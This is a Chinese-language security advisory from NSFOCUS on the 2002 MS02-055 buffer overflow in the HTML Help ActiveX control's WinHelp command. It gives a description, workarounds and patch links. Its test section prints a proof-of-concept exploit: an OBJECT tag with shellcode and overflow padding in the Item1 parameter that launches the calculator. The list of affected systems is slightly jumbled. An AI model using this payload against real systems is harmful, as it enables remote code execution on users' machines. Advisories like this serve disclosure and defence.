首页 -> 安全研究
安全研究
安全漏洞
Microsoft ActiveX Winhelp32缓冲区溢出漏洞(MS02-055)
发布日期:2002-08-05
更新日期:2002-08-13
受影响系统:
Microsoft HMTL Help ActiveX winhelp32.exe不受影响系统:
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Microsoft HMTL Help ActiveX winhelp32.exe描述:
- Microsoft Windows 2000 Server SP3
BUGTRAQ ID: 4857
CVE(CAN) ID: CVE-2002-0823
HMTL Help ActiveX控件用于提供导航功能如把内容列表并把内容显示在另外一个窗口或窗口弹出,以及其他功能。
HMTL Help ActiveX控件中的winhelp命令存在问题,远程攻击者可以利用这个漏洞对Winhlp32.exe进行缓冲溢出攻击。
通过HTML Help ActiveX控件(HHCtrl.ocx)实现的HTML Help包含多个功能。HTML Help ActiveX控件可以显示被编译的帮助系统文件中的内容,就像在浏览器中显示HTMl页面一样。HTML Help ActiveX控件提供的功能可以运行在HTML Help Viewer中或任何支持ActiveX控件的浏览器中如Internetn Explorer中。其中HTML Help ActiveX控件包含的WinHlep命令只有在使用编译好的HTML Help文件(.chm)并由HTML Help Viewer显示时才可用。
WinHlp命令对其中的一个参数(item)缺少正确的检查,可导致Winhlp32.exe产生缓冲区溢出,item参数用于指定WinHelp主题中的WinHelp(.hlp)文件的存储路径和目标窗口的窗口名称。利用这个缓冲区溢出,攻击者可以构建恶意WEB页面诱目标用户点击,而可以以目标用户权限在系统中执行任意指令。另外攻击者也可以通过发送EMAIL来触发这个漏洞,当邮件用户代理程序如果允许预览和允许执行ActiveX对象的情况下(一般为默认设置),可导致包含在邮件中的代码自动执行。
多个CVE_ID与此漏洞相关,它们是:CAN-2002-0693、CAN-2002-0694、CAN-2002-0823 。
<*来源:Mark Litchfield (mark@ngssoftware.com)
链接:http://support.microsoft.com/default.aspx?scid=kb;en-us;q293338
http://www.nextgenss.com/advisories/winhelp-bo.txt
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
下面的代码将会在目标主机上执行计算器程序。
<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
type=application/x-oleobject width=0><PARAM NAME="Width"
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
VALUE="WinHelp"><PARAM NAME="Item1"
VALUE="3àPhcalc4$ƒàPV¸ˉ§éwÿD3àP¾”éwÿÖAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP
PPPQQQQRRRRSSSSTTTAAAA©õwABCDEFGHƒÆÿægMyWindow"><PARAM
NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在IE的安全等级中设为高,或者禁用ActiveX控件。
* 暂时取消winhlp32.exe的执行权限。
厂商补丁:
Microsoft
---------
Microsoft为此单独发布了一个安全公告(MS02-055)以及相应补丁:
MS02-055: Unchecked Buffer in Windows Help Facility Could Enable Code Execution (Q323255)
链接: http://www.microsoft.com/technet/security/bulletin/MS02-055.asp
补丁下载:
Windows 98 and Windows 98 SE:
http://www.microsoft.com/windows98/downloads/contents/WUCritical/q323255/default.asp
Windows NT 4.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=43308
Windows NT 4.0, Terminal Server Edition:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=43308
Windows 2000:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=40213
Windows XP Home Edition and Professional Edition:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=41834
浏览次数:3169
严重程度:0(网友投票)
绿盟科技给您安全的保障